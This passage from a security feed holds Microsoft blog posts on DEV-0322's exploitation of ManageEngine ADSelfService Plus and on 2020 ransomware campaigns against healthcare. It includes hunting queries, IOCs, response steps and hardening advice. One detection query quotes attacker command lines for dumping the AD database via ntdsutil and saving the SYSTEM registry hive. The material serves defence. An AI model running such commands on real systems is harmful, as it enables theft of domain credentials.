Hosts with higher risk events should be investigated first.\n\n<https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021.yaml>\n\nIn addition to these queries, there are equivalent queries that use the Microsoft Sentinel Information Model (MSIM) to look for the same activity. If you are using MSIM you can find these queries here:\n\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021-MSIM.yaml>\n * <https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021-MSIM.yaml>\n\n### Microsoft 365 Defender hunting queries\n\n**Name:** Surface devices with the CVE-2021-40539 vulnerability \n**Description:** Use this query to look for devices in your organization that are possibly vulnerable to CVE-2021-40539. [Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA2WQuw6CQBBFT23iP2yoNb4LCyqwsFETjT3iEjQgBlAaP967FkqwmJ27N7NnZjbE8uRCrHyQytlTkFDTEFHKPfIg4yZVyjmpNlPUCkuFoU-PFyPTkH5qrHQgkmXNWdrH1-kRiLRiyJSxYiI1l1owY4n35RjuYhRc9T5WF0PYmtARBx1vo6lyZef_-rrbVrvsNG0kTiJmqTrndzdsE_63dztV6lXoD949nbyNLgEAAA&timeRangeId=week>).\n\n`DeviceTvmSoftwareVulnerabilities \n| where CveId == \"CVE-2021-40539\" \n| project DeviceId, DeviceName, CveId, OSPlatform, SoftwareName, SoftwareVersion`\n\n**Name:** Hunt for suspicious dropped files post-exploitation \n**Description:** Look for suspicious files dropped by the threat actor\u2019s post-exploitation activity. 
[Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA41T20rDQBCdZ8F_WPrUQmzelT6U1EKhSlHfVKSm6T1JyUZrwI_3zMmGJlGhLNmZneuZS3zxxchUUpwduCVoBprLWiJQKwfQUDbQbEAN6R4yC34B2xQWarPA-10K55tBMgdncIegGvVSLvAuj0bIW9EGjFhIAp-Y2bryLB0J5FpecGbMtsKt-hHjz6m5o7VqLb4l5CoNICmATbPr-0EeZUhuh4yF9JGtxNgRj3foMh0RL4E2BWcpyeERI5byIU8fki98HXmVntw0qhtB_klMkYxdhbeQRIiaI2Ld9hvfkd3O2PHK_p5VqiQiFktU2ltFGsEmg-yEwrjJjUH3sNd4M9anHmtwVt5wJ5xRt9b5XgOPz42YwC50U7REUW1EBj_LXbGwSB1q7brhO8aZE3E5-5A5LDu6qk1ctXvOyzCDVtnuyxZa9TPIV05kQN8lZ_rBqWSspt7xck-qvOf2vekVNCqZMnvkKky4dyqxbmtiVuvz__g9mR77k7T2YgKfNp4DMWz5x-VyRWTa4YWr8wm-MRHm3I4D97Yetdoa749N8v7ZDu_M6j23F7qFG_qWM236DjlznY72qcr9A2VPOedoBAAA&timeRangeId=week>).\n\n`// Look for the specific files dropped by threat actor \nlet files = dynamic([\"C:\\\\ProgramData\\\\Microsoft\\\\Crypto\\\\RSA\\\\key.dat \", \"c:\\\\windows\\\\temp\\\\ccc.exe\"]); \nDeviceFileEvents \n| where FileName endswith \"elrs.exe\" or FolderPath has_any (files) \n// Increase the risk score of command accessing file also seen \n| join kind=leftouter (DeviceProcessEvents \n| where ProcessCommandLine contains \"cmd /c elrs.exe\") on DeviceId \n| project-reorder Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessAccountName`\n\n**Name:** Hunt for command lines observed in use by the DEV-0322 actor \n**Description:** Look for suspicious command lines that are used as part of the threat actor's post-exploitation activity. 
[Run query](<https://security.microsoft.com/v2/advanced-hunting?query=H4sIAAAAAAAAA71W72_SUBS9n038H8i-wAyDRM0-zGCic8uIsJixmJg5CbQd1NGCtMBm_OM997xXaaHFitE09N333v31zj33laY0pSIdmeK5h3SHcY7RwRjgGUgoLuYT8SF5EkGeyhCjB70l3rq74FyloTziHcsYczPOIQ0gVfB2MKr_p_IEc_NMsB8zYgAP_UykFn4uPIawDbDuSE1upGp1G9B6YJwmVipyICurpSshIrnYPWEGro1uspxhbYq5RokYe4C4E0pJvh49hpBc6Cww-tSImM0M4xg-NPPPeA6sfx-YJNZ6jgiyYuhwJfFmLDajfUMUnx7X0mtqndBiRY8uoq6sD7ULkIvK6rvBc8bw_Qoo1WFbZYQR9JeQXshzYhOV9rqwlT6Wl_SuKCWei1HcxtFULKlUudgjYrqu8hG0i23Tlj3G9zGLpUseLMiz5ASKa7kcYkprXKtyK4dAN83gd9BfkneefMhgcsYO0cpEGYtmQdcZtsSWwwlm6Y5I-jHbFdqTITHSeqn2CLKpvKKXjv0DvxX7c06LbManmb7v2MgV6A-w2-e6dngtp18Pmce8tM-AZ3WYS5TJVxkTYXdJvQt5D6uurewn_K6BbBc7N_IF71t5hjx6yCuytWvApi0f2WMmozZi-kTW4KsI_YuT7x_n_-CxyQS92Uw22i_f6V_v_gVZW8PJtNfPsTentx40lNEtMi-ExjXGgBnH5OPM2nSI29rC3OYa6aHAKvl6pPupDYzqG2uXtPC4XgZb1XsDnfW50h7Oea9nve5bxXK2-0UsPsGf2vag4-bcR29ZMY_M8yHdkx8Ome3ZO0a_YcqYIe8PXbv7zb-F6Ff9k1vO470-Zm9NyYBNVirnY1qptyubTS-VSyvD0_6WB_Nt-gpd_Sof0UptXZt3HqfzWFvPjb-LkXns_TuW7kYn3uokg07--bIRTvm9iJnPGVeUR4_WQzHjLmzddtvnIfQTp42GkHAKAAA&timeRangeId=week>).\n\n`// Look for command lines observed used by the threat actor \nlet cmd_lines = dynamic(['cmd.exe /c \"wmic /node:redacted process call create \"ntdsutil snapshot \\\\\"activate instance ntds\\\\\" create quit quit > c:\\\\windows\\\\temp\\\\nt.dat\";', 'regsvr32 /s c:\\\\windows\\\\temp\\\\user64.dll', 'process call create \"cmd /c c:\\\\windows\\\\temp\\\\gac.exe -i c:\\\\windows\\temp\\\\ScriptModule.dll >c:\\\\windows\\\\temp\\\\tmp.dat\"']); \nDeviceProcessEvents \n// Look for static cmd lines and dynamic one using regex \n| where ProcessCommandLine has_any (cmd_lines) or ProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" or InitiatingProcessCommandLine has_any (cmd_lines) or InitiatingProcessCommandLine matches regex \"save HKLM\\\\SYSTEM [^ ]*_System.HIV\" \n| summarize count(), FirstSeen=min(Timestamp), LastSeen = max(Timestamp) by DeviceId, DeviceName, 
ProcessCommandLine, AccountName, FileName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName, InitiatingProcessAccountSid \n// Base risk score on number of command lines seen for each host \n| extend RiskScore = count_ \n| project-reorder FirstSeen, LastSeen, RiskScore, DeviceName, DeviceId, ProcessCommandLine, AccountName \n| extend timestamp = FirstSeen, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName`\n\n## Indicators of compromise (IOCs)\n\nType | Indicator \n---|--- \nSHA-256 | bb4765855d2c18c4858dac6af207a4b33e70c090857ba21527dc2b22e19d90b5 \nSHA-256 | e5edd4f773f969d81a09b101c79efe0af57d72f19d5fe71357de10aacdc5473e \nSHA-256 | 79e3f4ef28ab6f118c839d01a404cccae56f4067f3f2d2add3603be5c717932b \nSHA-256 | a2da9eeb47a0eef4a93873bcc595f8a133a927080a2cd0d3cb4b4f5101a5c5c2 \nSHA-256 | d1d43afd8cab512c740425967efc9ed815a65a8dad647a49f9008732ffe2bb16 \nSHA-256 | 3c90df0e02cc9b1cf1a86f9d7e6f777366c5748bd3cf4070b49460b48b4d4090 \nSHA-256 | ae93e2f0b3d0864e4dd8490ff94abeb7279880850b22e8685cd90d21bfe6b1d6 \nSHA-256 | b4162f039172dcb85ca4b85c99dd77beb70743ffd2e6f9e0ba78531945577665 \nSHA-256 | b0a3ee3e457e4b00edee5746e4b59ef7fdf9b4f9ae2e61fc38b068292915d710 \nSHA-256 | bec067a0601a978229d291c82c35a41cd48c6fca1a3c650056521b01d15a72da \nSHA-256 | 1e031d0491cff504e97a5de5308f96dc540d55a34beb5b3106e5e878baf79d59 \nSHA-256 | f757d5698fe6a16ec25a68671460bd10c6d72f972ca3a2c2bf2c1804c4d1e20e \nSHA-256 | 322368e7a591af9d495406c4d9b2461cd845d0323fd2be297ec06ed082ee7428 \nSHA-256 | 5fcc9f3b514b853e8e9077ed4940538aba7b3044edbba28ca92ed37199292058 \nSHA-256 | b2a29d99a1657140f4e254221d8666a736160ce960d06557778318e0d1b7423b \n \n \n\nThe post [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": 
{}, "published": "2021-11-09T00:24:55", "type": "mssecure", "title": "Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:24:55", "id": "MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13", "href": "https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. 
Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. 
Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. 
They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. 
On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. 
RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. 
These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. 
Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. 
REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. 
Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. 
Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavior-based hunting where possible, and on hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. 
[Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. 
Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. 
Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assessments to measure security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. 
And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protection (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. 
On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust 
Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevtutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security software using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", 
